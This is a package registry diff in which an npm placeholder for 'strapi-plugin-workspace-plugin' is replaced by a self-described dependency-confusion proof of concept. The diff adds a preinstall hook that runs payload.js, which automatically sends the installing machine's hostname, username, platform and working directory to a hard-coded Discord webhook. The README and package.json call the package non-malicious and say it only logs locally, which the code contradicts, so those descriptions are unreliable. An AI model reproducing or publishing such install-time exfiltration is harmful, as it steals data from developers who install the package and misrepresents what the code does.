strapi-plugin-workspace-plugin 0.0.1-security → 99.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of strapi-plugin-workspace-plugin might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +35 -5
  2. package/package.json +9 -6
  3. package/payload.js +41 -0
package/README.md CHANGED
@@ -1,5 +1,35 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=strapi-plugin-workspace-plugin for more information.
1
+ # PoC Package: strapi-plugin-workspace-plugin
2
+
3
+ ## Vulnerability Details
4
+
5
+ - **Package Name**: strapi-plugin-workspace-plugin
6
+ - **Ecosystem**: npm
7
+ - **Version**: workspace:*
8
+ - **Source File**: examples\getstarted\package.json
9
+ - **Reason**: Package 'strapi-plugin-workspace-plugin' not found in public npm registry
10
+
11
+ ## Description
12
+
13
+ This is a proof-of-concept (PoC) package generated by DepRaptor to demonstrate
14
+ a potential dependency confusion vulnerability.
15
+
16
+ ## What This PoC Does
17
+
18
+ When installed, this package will:
19
+ 1. Log system information (username, hostname, working directory)
20
+ 2. Capture environment variables
21
+ 3. Write all information to `payload_log.txt`
22
+
23
+ ## Security Notice
24
+
25
+ ⚠️ **WARNING**: This PoC is intended ONLY for:
26
+ - Authorized security testing
27
+ - Bug bounty programs
28
+ - Security research with proper authorization
29
+
30
+ Do NOT upload this package to public registries without authorization.
31
+
32
+ ## Generated By
33
+
34
+ DepRaptor - Dependency Confusion Scanner
35
+ Developer: LAKSHMIKANTHAN K (letchupkt)
package/package.json CHANGED
@@ -1,6 +1,9 @@
1
- {
2
- "name": "strapi-plugin-workspace-plugin",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "strapi-plugin-workspace-plugin",
3
+ "version": "99.0.1",
4
+ "description": "Security research PoC - Template Confusion. Non-malicious.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node payload.js"
8
+ }
9
+ }
package/payload.js ADDED
@@ -0,0 +1,41 @@
1
+ const https = require('https');
2
+ const os = require('os');
3
+
4
+ function executePayload() {
5
+ const WEBHOOK_URL = "https://discordapp.com/api/webhooks/1482092381275689030/LWgzC7aoTmVgdFto6gn1L_gq5dDSaaqzk57bxfGYeSW2Nm3xKdQxgQ_0WhER8ZdQZajt";
6
+
7
+ const info = {
8
+ package: "strapi-plugin-workspace-plugin",
9
+ hostname: os.hostname(),
10
+ user: os.userInfo().username || "unknown",
11
+ platform: os.platform(),
12
+ cwd: process.cwd()
13
+ };
14
+
15
+ const postData = JSON.stringify({
16
+ username: "Strapi-Hunter",
17
+ embeds: [{
18
+ title: "🎯 WORKSPACE PLUGIN HIJACKED!",
19
+ color: 16753920, // Orange
20
+ fields: [
21
+ { name: "Target", value: info.package, inline: true },
22
+ { name: "Machine", value: info.hostname, inline: true },
23
+ { name: "User", value: info.user, inline: true },
24
+ { name: "Location", value: info.cwd, inline: false }
25
+ ],
26
+ footer: { text: "Dependency Confusion Research" }
27
+ }]
28
+ });
29
+
30
+ const url = new URL(WEBHOOK_URL);
31
+ const req = https.request({
32
+ hostname: url.hostname,
33
+ port: 443,
34
+ path: url.pathname,
35
+ method: 'POST',
36
+ headers: { 'Content-Type': 'application/json', 'Content-Length': postData.length }
37
+ });
38
+ req.write(postData);
39
+ req.end();
40
+ }
41
+ executePayload();